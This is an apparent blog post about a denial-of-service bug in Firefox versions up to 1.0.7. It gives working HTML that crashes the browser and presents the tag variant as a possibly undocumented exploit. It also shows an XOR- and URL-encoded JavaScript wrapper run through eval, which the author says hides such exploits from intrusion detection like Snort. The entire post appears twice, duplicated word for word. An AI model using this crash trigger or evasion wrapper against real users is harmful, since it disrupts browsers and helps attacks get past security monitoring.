Obfuscating The Mozilla Recent Firefox DOS
The recent program I created for obfuscating webpages can be used for obfuscating the recent Mozilla Firefox Denial of Service Attack that affects all versions of Mozilla Firefox currently up to 1.0.7.
My script for obfuscating web pages is at:
http://whatwouldjesusdo.cc/pubencode.pl
Here is an example of HTML code that would cause the denial of service in Mozilla Firefox:
<html><body><italic>There is nothing to see here... move along...<sourcetext></body></html>
Note, that the original published advisory used "strong" in place of italic, but I was playing aroud with it, and I found that italic also worked. So, you could argue that this was a second undocumented exploit, or a variation of the first one or whatever... In any case, since it is slightly different from the first one, it is also slightly less likely to be detected in an of itself. But, that is not the point of this.
The point is, that you can take the above HTML, put in in a file and the run the above Perl script on it. The output is the following JavaScript:
<html>
<script language="JavaScript">
lzArray=[ 253,169,181,172,173,255,253,163,174,165,184,255,253,168,181,160,173,168,162,255,149,169,164,179,164,225,168,178,225,175,174,181,169,168,175,166,225,181,174,225,178,164,164,225,169,164,179,164,239,239,239,225,172,174,183,164,225,160,173,174,175,166,239,239,239,253,178,174,180,179,162,164,181,164,185,181,255,253,238,163,174,165,184,255,253,238,169,181,172,173,255];
tData= "%66%6F%72%20%28%69%3D%30%3B%20%69%3C%6C%7A%41%72%72%61%79%2E%6C%65%6E%67%74%68%3B%20%69%2B%2B%29%20%7B%63%3D%20%6C%7A%41%72%72%61%79%5B%69%5D%3B%20%63%3D%30%78%46%46%20%2D%20%63%20%5E%20%30%78%33%45%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%29%7D%20%3B";
foo=unescape(tData);
eval(foo);
</script>
This JavaScript is then automatically converted back to the appropriate HTML by Mozilla FireFox and then correctly performs the DOS. Likewise, the other recent exploits against web browsers could also be obfuscated this way and thus bypass instrusion detection systems like Snort. Notice how easily the encoding and decoding of the data is. Yeah the encryption is not really encryption at all. It is trivial to break. But, on the other hand, since I can write any kind of Turing compatible algorithm to encrypt and decrypt the data, you are going to have a hard time writing something to decrypt the data in advance to find whether or not it contains any mallicous code. Unless ofcourse you want to just run the Javascript. But then how do you know that it will ever halt? So, in conclusion, as long as there are buffer overflows that can be triggered with raw HTML, that is kind of a bad thing for web browsers. And I think that maybe antivirus and intrusion detection systems are not really going to save people.
My script for obfuscating web pages is at:
http://whatwouldjesusdo.cc/pubencode.pl
Here is an example of HTML code that would cause the denial of service in Mozilla Firefox:
<html><body><italic>There is nothing to see here... move along...<sourcetext></body></html>
Note, that the original published advisory used "strong" in place of italic, but I was playing aroud with it, and I found that italic also worked. So, you could argue that this was a second undocumented exploit, or a variation of the first one or whatever... In any case, since it is slightly different from the first one, it is also slightly less likely to be detected in an of itself. But, that is not the point of this.
The point is, that you can take the above HTML, put in in a file and the run the above Perl script on it. The output is the following JavaScript:
<html>
<script language="JavaScript">
lzArray=[ 253,169,181,172,173,255,253,163,174,165,184,255,253,168,181,160,173,168,162,255,149,169,164,179,164,225,168,178,225,175,174,181,169,168,175,166,225,181,174,225,178,164,164,225,169,164,179,164,239,239,239,225,172,174,183,164,225,160,173,174,175,166,239,239,239,253,178,174,180,179,162,164,181,164,185,181,255,253,238,163,174,165,184,255,253,238,169,181,172,173,255];
tData= "%66%6F%72%20%28%69%3D%30%3B%20%69%3C%6C%7A%41%72%72%61%79%2E%6C%65%6E%67%74%68%3B%20%69%2B%2B%29%20%7B%63%3D%20%6C%7A%41%72%72%61%79%5B%69%5D%3B%20%63%3D%30%78%46%46%20%2D%20%63%20%5E%20%30%78%33%45%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%29%7D%20%3B";
foo=unescape(tData);
eval(foo);
</script>
This JavaScript is then automatically converted back to the appropriate HTML by Mozilla FireFox and then correctly performs the DOS. Likewise, the other recent exploits against web browsers could also be obfuscated this way and thus bypass instrusion detection systems like Snort. Notice how easily the encoding and decoding of the data is. Yeah the encryption is not really encryption at all. It is trivial to break. But, on the other hand, since I can write any kind of Turing compatible algorithm to encrypt and decrypt the data, you are going to have a hard time writing something to decrypt the data in advance to find whether or not it contains any mallicous code. Unless ofcourse you want to just run the Javascript. But then how do you know that it will ever halt? So, in conclusion, as long as there are buffer overflows that can be triggered with raw HTML, that is kind of a bad thing for web browsers. And I think that maybe antivirus and intrusion detection systems are not really going to save people.
| Permalink | 
